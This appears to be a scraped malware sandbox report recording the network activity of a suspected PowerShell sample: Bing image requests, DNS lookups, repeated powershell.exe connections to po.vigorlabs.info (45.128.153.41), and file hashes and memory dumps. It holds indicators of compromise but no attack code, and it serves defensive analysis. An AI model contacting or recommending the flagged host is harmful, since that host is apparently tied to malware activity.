user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 792794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 19889026591D42218C7D8C69213094CE Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
date: Mon, 22 Apr 2024 19:37:22 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 621794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E29206191939406B9C5FAD126B306ACD Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
date: Mon, 22 Apr 2024 19:37:22 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 627437
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6601653DDA3C43D4BD91D8E993EA79E8 Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
date: Mon, 22 Apr 2024 19:37:23 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.22000

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 659775
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8CDBAE6DC17E41C1A7361D6B90B85F6E Ref B: LON04EDGE0813 Ref C: 2024-04-22T19:37:23Z
date: Mon, 22 Apr 2024 19:37:23 GMT

45.128.153.41:443

po.vigorlabs.info

powershell.exe

260 B
160 B
5
4
23.62.61.195:443

www.bing.com

tls

2.1kB
11.6kB
23
16
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

134.4kB
3.7MB
2672
2666

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.0kB
14
11
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.6kB
8.0kB
16
11
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
8.1kB
16
14
45.128.153.41:443

po.vigorlabs.info

powershell.exe

260 B
200 B
5
5
45.128.153.41:443

po.vigorlabs.info

powershell.exe

260 B
160 B
5
4
45.128.153.41:443

po.vigorlabs.info

powershell.exe

260 B
120 B
5
3
45.128.153.41:443

po.vigorlabs.info

powershell.exe

260 B
120 B
5
3

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

740 B
1.6kB
11
10

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

ocsp.digicert.com

DNS Response

192.229.221.95

DNS Request

arc.msn.com

DNS Response

20.223.35.26

DNS Request

26.35.223.20.in-addr.arpa

DNS Request

195.61.62.23.in-addr.arpa

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200

DNS Request

ctldl.windowsupdate.com

DNS Response

2.17.197.240

2.17.197.249

DNS Request

arc.msn.com

DNS Response

20.223.36.55

DNS Request

54.120.234.20.in-addr.arpa

DNS Request

nexusrules.officeapps.live.com

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.243.30
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

830 B
2.0kB
12
12

DNS Request

17.160.190.20.in-addr.arpa

DNS Request

po.vigorlabs.info

DNS Response

45.128.153.41

DNS Request

172.210.232.199.in-addr.arpa

DNS Request

www.bing.com

DNS Response

23.62.61.195

23.62.61.176

23.62.61.162

23.62.61.185

23.62.61.169

23.62.61.193

23.62.61.57

23.62.61.59

23.62.61.72

DNS Request

arc.msn.com

DNS Response

20.223.35.26

DNS Request

200.197.79.204.in-addr.arpa

DNS Request

240.197.17.2.in-addr.arpa

DNS Request

ris.api.iris.microsoft.com

DNS Response

20.234.120.54

DNS Request

55.36.223.20.in-addr.arpa

DNS Request

30.243.111.52.in-addr.arpa

DNS Request

self.events.data.microsoft.com

DNS Response

40.79.173.40

DNS Request

40.173.79.40.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwkqqyeb.b3o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4972-8-0x0000018B2DE30000-0x0000018B2DE52000-memory.dmp

Filesize
136KB

Download
memory/4972-9-0x00007FFB71050000-0x00007FFB71B12000-memory.dmp

Filesize
10.8MB

Download
memory/4972-10-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

Filesize
64KB

Download
memory/4972-11-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

Filesize
64KB

Download
memory/4972-12-0x00007FFB71050000-0x00007FFB71B12000-memory.dmp

Filesize
10.8MB

Download
memory/4972-13-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

Filesize
64KB

Download
memory/4972-14-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.